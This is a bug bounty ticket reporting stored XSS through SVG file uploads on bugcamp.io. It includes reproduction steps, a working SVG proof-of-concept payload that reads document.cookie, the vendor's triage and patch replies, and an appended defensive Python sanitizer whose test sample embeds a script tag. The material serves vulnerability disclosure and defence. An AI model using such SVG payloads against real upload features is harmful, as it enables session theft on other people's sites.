Vulnerability type
Details
summary
XSS with SVG upload
Reproduction process
- make a new report
- in the attachment section add an SVG file with a JavaScript payload
- upload and go to the file link you will get the alert
Possible cause of vulnerability
xss
How to patch
You must sanitize your input. Your application code should never output data received as input directly to the browser without checking it for malicious code.
For more details, refer to the following articles: Preventing XSS Attacks and How to Prevent DOM-based Cross-site Scripting. You can also find useful information in the XSS Prevention Cheat Sheet maintained by the OWASP organization.
Expected results and impact
xss
Other notes and references
https://hackerone.com/reports/894876
https://hackerone.com/reports/148853
https://hackerone.com/reports/647130
Attachments
Timeline
hi team
that is the poc code of svg
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS by Spade\n'+document.domain+'\n'+document.cookie);
</script>
</svg>
I made another report just to make a PoC for that
the report id is : https://bugcamp.io/tickets/4e615aa96f853f7aafa08c0fc59a1482
Hello M0X0101.
The ticket has been accepted.
The vulnerability was caused by a developer’s mistake: a validation routine was omitted.
Patch in progress.
We decided the severity of this report is “LOW”, because the XSS payload is triggered at “static.bugcamp.io”, which is outside the boundary of the bounty program policy and is used only for static file serving.
We considered various ways the vulnerability could be misused, but there was no effective scenario.
If you have a provable, impactful scenario (like account takeover, etc.), please let us know. Then we’ll re-evaluate this ticket.
Thank you.
Thanks
But there was some problem on payment method as I’m Egyptian.
And the support team told me they can send it to my bank if the total bounty is greater than 50000
Okay, we are also considering a payment method for foreigners.
Please email to “support@bugcamp.io”.
we can discuss about it.
Hi M0X0101.
The patch has been deployed.
Please make sure that the vulnerability has been patched properly.
Reward is ₩30,000
Please submit it along with the PoC code.
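The validation routine that the triage reply says was omitted, sketched as an added example (not bugcamp's code and not part of the ticket): an allowlist check run on SVG attachments at upload time, plus response headers for the static-file host. The tag and attribute allowlists, the function name `svg_findings` and the header set are assumptions chosen for illustration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "{http://www.w3.org/2000/svg}"
# Assumed allowlist for this sketch: static shapes only, extend deliberately.
ALLOWED_TAGS = {"svg", "g", "path", "rect", "circle", "ellipse", "line",
                "polyline", "polygon", "title", "desc"}
ALLOWED_ATTRS = {"id", "version", "baseProfile", "viewBox", "width", "height",
                 "x", "y", "x1", "y1", "x2", "y2", "cx", "cy", "r", "rx", "ry",
                 "d", "points", "fill", "stroke", "stroke-width", "transform"}
# Defence in depth when serving stored uploads from the static-file host:
# force a download and forbid script even if a file slips past the check.
UPLOAD_RESPONSE_HEADERS = {
    "Content-Disposition": "attachment",
    "X-Content-Type-Options": "nosniff",
    "Content-Security-Policy": "default-src 'none'; sandbox",
}


def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means accept."""
    if b"<!ENTITY" in data:  # cheap guard against entity-expansion tricks
        return ["entity declaration not allowed"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]
    findings = []
    for el in root.iter():
        tag = el.tag
        if not tag.startswith(SVG_NS) or tag[len(SVG_NS):] not in ALLOWED_TAGS:
            findings.append(f"element {tag} not allowed")
        for name in el.attrib:
            # Rejects on* handlers, style, href/xlink:href and anything unknown.
            if name not in ALLOWED_ATTRS:
                findings.append(f"attribute {name} not allowed")
    return findings


# Constructed sample modelled on the PoC in this ticket (script inside an SVG).
SAMPLE = (b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">'
          b'<polygon points="0,0 0,50 50,0" fill="#009900"/>'
          b'<script type="text/javascript">alert(document.domain)</script>'
          b'</svg>')

if __name__ == "__main__":
    print(svg_findings(SAMPLE))
```

An allowlist is used rather than a search for `<script>` because SVG has many other active-content paths (event-handler attributes, `foreignObject`, links), and anything not explicitly permitted is rejected.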